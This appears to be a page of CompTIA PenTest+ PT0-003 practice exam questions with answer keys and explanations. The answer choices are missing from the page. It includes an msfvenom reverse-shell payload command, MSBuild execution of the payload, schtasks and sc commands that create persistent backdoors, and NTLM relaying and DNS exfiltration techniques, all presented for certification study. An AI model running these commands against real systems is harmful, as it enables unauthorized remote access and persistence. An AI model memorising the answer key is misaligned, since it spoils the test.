CompTIA PenTest+ PT0-003 Exam Practice Test

Page: 1 / 14
Total 252 questions
Question 1

[Attacks and Exploits]

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?



Answer : B

The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:

Understanding MSBuild.exe:

Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It's commonly used to build .NET applications and can also execute code embedded in project files.

Command Usage:

Command: MSBuild.exe C:\evil.xml

This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.

Comparison with Other Commands:

regsvr32 /s /n /u C:\evil.xml: Used to register or unregister DLLs, not suitable for executing C# code.

mshta.exe C:\evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.

AppInstaller.exe C:\evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.

Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.


Question 2

[Information Gathering and Vulnerability Scanning]

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

Nmap scan report for some_host

Host is up (0.01 latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results: smb2-security-mode: Message signing disabled

Which of the following commands and attack methods would be the most appropriate for reducing the chances of being detected?



Answer : A

Explanation of the Correct Option:

A (responder and ntlmrelayx.py):

Responder is a tool for intercepting and relaying NTLM authentication requests.

Since SMB signing is disabled, ntlmrelayx.py can relay authentication requests and escalate privileges to move laterally without directly brute-forcing credentials, which is stealthier.

Why Not Other Options?

B: Exploiting MS17-010 (psexec) is noisy and likely to trigger alerts.

C: Brute-forcing credentials with Hydra is highly detectable due to the volume of failed login attempts.

D: Nmap scripts like smb-brute.nse are useful for enumeration but involve brute-force methods that increase detection risk.

CompTIA Pentest+ Reference:

Domain 3.0 (Attacks and Exploits)


Question 3

[Attacks and Exploits]

A penetration tester gains access to the target network and observes a running SSH server.

Which of the following techniques should the tester use to obtain the version of SSH running on the target server?



Answer : C

Banner grabbing is used to extract version information from services, including SSH, FTP, and web servers.

Option A (Network sniffing) : Captures packets, but does not directly reveal service versions.

Option B (IP scanning) : Identifies active hosts, but not SSH versions.

Option C (Banner grabbing) : Correct.

Can be performed with:

nc <target> 22

or

telnet <target> 22

Option D (DNS enumeration) : Retrieves domain name records, not SSH versions.

Reference: CompTIA PenTest+ PT0-003 Official Guide -- Service Enumeration & Banner Grabbing


Question 4

[Attacks and Exploits]

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).



Answer : A, E

To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.

schtasks.exe:

Purpose: Used to create, delete, and manage scheduled tasks on Windows systems.

Persistence: By creating a scheduled task, the tester can ensure a script or program runs at a specified time, providing a persistent backdoor.

Example:

schtasks /create /tn "Backdoor" /tr "C:\path\to\backdoor.exe" /sc daily /ru SYSTEM

sc.exe:

Purpose: Service Control Manager command-line tool used to manage Windows services.

Persistence: By creating or modifying a service to run a malicious executable, the tester can maintain persistent access.

Example:

sc create backdoor binPath= "C:\path\to\backdoor.exe" start= auto

Other Utilities:

rundll.exe: Used to run DLLs as applications, not typically used for persistence.

cmd.exe: General command prompt, not specifically used for creating persistence mechanisms.

chgusr.exe: Used to change install mode for Remote Desktop Session Host, not relevant for persistence.

netsh.exe: Used for network configuration, not typically used for persistence.

Pentest Reference:

Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.

Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches.

By using schtasks.exe and sc.exe, the penetration tester can set up persistent mechanisms that will allow reentry into the system even after the patch is applied.


Question 5

[Attacks and Exploits]

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?



Answer : A

Covert Data Exfiltration:

DNS traffic can be leveraged for covert data exfiltration because it is often allowed through firewalls and not heavily monitored.

Tools or techniques for DNS tunneling encode sensitive information into DNS queries or responses, resulting in an observable increase in DNS traffic.

Why Not Other Options?

B (URL spidering): This increases HTTP traffic, not DNS traffic.

C (HTML scraping): Involves downloading website content, which primarily uses HTTP or HTTPS.

D (DoS attack): A DNS-based DoS attack would likely involve query floods from many sources, not necessarily related to the observed behavior in a penetration test.

CompTIA Pentest+ Reference:

Domain 3.0 (Attacks and Exploits)

Covert Communication Techniques and DNS Tunneling


Question 6

[Tools and Code Analysis]

A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:

for var in --MISSING TEXT-- do

ping -c 1 192.168.10.$var

done

Which of the following pieces of code should the penetration tester use in place of --MISSING TEXT--?



Answer : B

The seq command generates a sequence of numbers, making it the best choice for iterating through IP addresses in a Class C subnet.

Option A (crunch) : Crunch generates wordlists, not IP ranges.

Option B (seq 1 254) : Correct. Generates the range 1-254 for a Class C subnet.

Option C (echo 1-254) : Outputs the string '1-254' instead of expanding it into numbers.

Option D (fl..254) : Incorrect syntax.

Reference: CompTIA PenTest+ PT0-003 Official Guide -- Bash Scripting for Automation


Question 7

[Information Gathering and Vulnerability Scanning]

During an assessment, a penetration tester obtains access to an internal server and would like to perform further reconnaissance by capturing LLMNR traffic. Which of the following tools should the tester use?



Answer : C

Responder is a tool specialized in capturing LLMNR, NBNS and mDNS traffic and performing spoofing attacks and hash capture. It is widely used in Windows environments to capture credentials when hosts try to resolve names that do not exist in DNS.

Netcat and Burp Suite are not designed for this purpose. Nmap is used for network scanning, but not for capturing or exploiting LLMNR.

Reference: PT0-003 Objective 4.2 -- Explain lateral movement techniques and privilege escalation tools (Responder is explicitly listed).

